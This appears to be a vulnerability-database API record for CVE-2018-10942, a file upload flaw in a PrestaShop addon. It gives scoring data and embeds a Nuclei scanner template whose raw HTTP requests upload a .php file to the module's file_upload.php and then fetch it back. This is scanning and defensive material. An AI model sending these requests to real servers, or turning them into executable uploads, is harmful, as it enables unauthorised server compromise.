{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-10942/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-10942/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-10942/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-10942/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-10942/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-10942"},"sightings":{"href":"/api/v1/sightings/cve-2018-10942"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.12555,"kev":false,"percentile":0.96053},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-10942.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-10942\n\ninfo:\n  name: Prestashop AttributeWizardPro Module - Arbitrary File Upload\n  author: MaStErChO\n  severity: critical\n  description: |\n    In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n  impact: |\n    Unauthenticated attackers can upload and execute arbitrary PHP files, leading to complete server compromise, data theft, and potential lateral movement within the network.\n  remediation: |\n    Remove or update the Attribute Wizard addon to a patched version.\n  reference:\n    - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en\n    - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-10942\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-10942\n    cwe-id: CWE-434\n    epss-score: 0.12555\n    epss-percentile: 0.96053\n    cpe: cpe:2.3:a:attribute_wizard_project:attribute_wizard:1.6.9:*:*:*:*:prestashop:*:*\n  metadata:\n    max-request: 8\n    vendor: attribute_wizard_project\n    product: attribute_wizard\n    framework: prestashop\n  tags: prestashop,attributewizardpro,intrusive,file-upload,cve2018,cve,attribute_wizard_project,vkev,vuln\nvariables:\n  filename: '{{rand_base(7, \"abc\")}}'\n\nhttp:\n  - raw:\n      - |\n        POST /modules/{{paths}}/file_upload.php  HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n        --ba1f796d0aa2482e9c51c81ae6087818\n        Content-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\n        Content-Type: multipart/form-data\n\n        {{randstr}}\n        --ba1f796d0aa2482e9c51c81ae6087818--\n\n      - |\n        GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\n        Host: {{Hostname}}\n\n    payloads:\n      paths:\n        - 'attributewizardpro'\n        - '1attributewizardpro'\n        - 'attributewizardpro.OLD'\n        - 'attributewizardpro_x'\n\n    stop-at-first-match: true\n    host-redirects: true\n    max-redirects: 3\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_1\n        words:\n          - '{{filename}}'\n\n      - type: word\n        part: body_2\n        words:\n          - '{{randstr}}'\n\n    extractors:\n      - type: regex\n        name: file\n        part: body_1\n        internal: true\n        group: 1\n        regex:\n          - '(.*?)\\|\\|\\|\\|'\n# digest: 4b0a00483046022100b7c625275402a4f0745bdf6d912a4842ab499046c20335cde5d6105f08a92a8c022100a8dc2d887f53feed98e914e92785389fab2da89b76249898365c3eb8811ea08b:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-10942"}